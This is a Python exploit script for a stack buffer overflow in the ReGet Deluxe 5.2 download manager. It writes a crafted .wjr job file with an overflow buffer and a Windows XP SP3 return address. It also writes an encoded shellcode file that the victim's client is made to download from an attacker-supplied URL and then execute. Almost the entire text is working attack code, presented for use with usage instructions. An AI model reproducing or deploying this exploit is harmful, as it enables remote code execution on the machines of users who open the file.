import sys
print "" print " ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit" print " By: Encrypt3d.M!nd " print " http://m1nd3d.wordpress.com/ " print " For Details visit my blog " print ""
try:
header = ( "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F" "\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65" "\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20" "\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65" "\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65" "\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09" "\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54" "\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09" "\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D" "\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09" "\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53" "\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20" "\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75" "\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61" "\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50" "\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D" "\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22" "\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43" "\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F" "\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72" "\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09" "\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09" "\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73" "\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79" "\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C" "\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09" "\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D" "\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D" "\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E" "\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53" "\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74" "\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09" "\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D" "\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")
buff = "\x41" * 268 buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars) buff+= "\x41" * 1000
foot = ( "\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31" "\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52" "\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")
evil = "\x90" * 100 evil+= ( "\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39" "\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c" "\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62" "\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45" "\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c" "\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48" "\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42" "\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f" "\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48" "\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47" "\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51" "\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47" "\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d" "\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c" "\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c" "\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46" "\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34" "\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49" "\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76" "\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43" "\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77" "\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42" "\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c" "\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44" "\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30" "\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43" "\x30\x41\x41")
evil+="\x41" * 70000
wjr_file=open('devil.wjr','w') wjr_file.write(header+buff+foot) wjr_file.close() print "[+] 'devil.wjr' Created Successfully"
devil_file=open('shellcode','w') devil_file.write(evil) devil_file.close() print "[+] 'shellcode' Created Successfully"
except: print "###################################################" print " Usage: exploit.py [payload] " print " [payload] = url to shellcode without(http://) " print " Example: " print " exploit.py www.site.com/shellcode "
|